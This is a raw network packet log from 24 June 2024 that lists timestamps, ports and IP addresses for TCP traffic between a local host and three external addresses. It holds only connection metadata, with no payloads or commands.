Jun 24, 2024 00:10:22.447478056 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447510004 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447587013 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447598934 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447609901 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447621107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447633982 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447686911 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447686911 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447793007 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447804928 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447817087 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447848082 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447849035 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447891951 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447904110 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447915077 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447926998 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447937012 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447938919 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.447957993 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447979927 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.447989941 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448002100 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448013067 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448039055 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448065996 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448081970 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448095083 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448107004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448127985 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448158026 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448177099 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448188066 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448194027 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448199034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448209047 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448237896 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448265076 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448282957 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448295116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448306084 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448314905 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448333025 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448364973 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448400974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448411942 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448422909 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448434114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448445082 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448448896 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448457003 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448470116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448471069 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448478937 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.448513031 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448513031 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.448542118 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.459801912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.459821939 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.459832907 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.459873915 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.459881067 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.459893942 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.459901094 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.459906101 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.459922075 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.459953070 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.460000992 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.460012913 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.460024118 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.460035086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.460047960 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.460084915 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.460375071 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.460386992 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.460392952 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.460398912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.460434914 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.460464954 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.466770887 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466790915 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466804028 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466813087 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466819048 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466825008 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466830969 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466834068 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.466841936 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466855049 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466857910 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.466866016 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466876984 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466880083 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.466895103 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466907024 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466911077 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.466917992 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466931105 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.466931105 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.466950893 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.466974020 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.484325886 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484360933 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484371901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484385967 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:22.484395027 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.484486103 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484498024 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484508991 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484513998 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.484522104 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484533072 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484534025 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.484555006 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.484606981 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484617949 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484628916 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484631062 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.484653950 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.484709024 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.484745979 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484878063 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484891891 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484903097 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484913111 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484921932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484925032 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.484934092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484945059 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484956026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484961987 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.484961987 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.484966040 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484977961 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.484989882 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.485022068 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.485058069 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485068083 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485150099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485161066 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485174894 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485187054 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485196114 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485200882 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485202074 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.485202074 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.485342026 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.485745907 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485780954 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485795975 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485827923 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485838890 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485840082 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.485850096 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.485898972 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.485898972 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.485934973 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485946894 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.485991955 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.485991955 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.486670971 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486707926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486718893 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486759901 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.486812115 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486830950 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486830950 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.486851931 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486864090 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486900091 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.486937046 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486952066 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486962080 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.486963034 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486974001 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486984968 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.486989021 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.486994982 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.486999035 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487024069 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.487046003 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.487070084 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487082005 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487104893 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487114906 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487126112 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487137079 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487147093 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487152100 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.487165928 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.487196922 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487209082 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487222910 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.487257004 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487267017 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487282038 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.487576962 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.487776041 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487823963 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487834930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487845898 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487850904 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.487869978 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487885952 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.487893105 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.487895012 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.487934113 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488003016 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488012075 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488020897 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488027096 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488037109 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488044977 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488063097 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488084078 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488096952 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488096952 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488112926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488128901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488135099 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488153934 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488164902 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488172054 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488176107 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488217115 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488226891 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488238096 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488241911 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488260984 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488310099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488312006 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488322020 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488332033 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488370895 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488380909 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488384962 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488390923 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488400936 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488425970 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488425970 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488466024 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488518000 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488528967 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488539934 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488550901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488562107 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488571882 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488574028 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488583088 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488595963 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488599062 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488620043 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488647938 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488658905 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488671064 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488696098 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488729000 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488739014 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.488765955 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.488836050 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.489280939 CEST	40960	49707	185.215.113.67	192.168.2.5
Jun 24, 2024 00:10:22.503144026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.503200054 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.503211021 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.503253937 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.503264904 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.503276110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.503285885 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.503912926 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.503953934 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.503964901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504045010 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504055023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504065037 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504075050 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504085064 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504141092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504151106 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504205942 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504215956 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504225969 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504235983 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.504245996 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.505986929 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.530109882 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530143023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530153990 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530211926 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.530237913 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530249119 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530260086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530271053 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530272007 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.530297995 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.530402899 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530415058 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530425072 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530435085 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530436993 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.530441046 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530471087 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.530580997 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.530977964 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530988932 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.530999899 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.531012058 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.531023026 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.531033993 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.531044960 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.531045914 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.531056881 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.531088114 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.531119108 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.533803940 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.533830881 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.533842087 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.533946037 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.534003973 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.534014940 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.534025908 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.534035921 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.534061909 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.534182072 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.534377098 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.534389019 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.534400940 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.534456968 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.534456968 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.534498930 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.534509897 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.534523010 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.534543037 CEST	80	49726	185.172.128.116	192.168.2.5
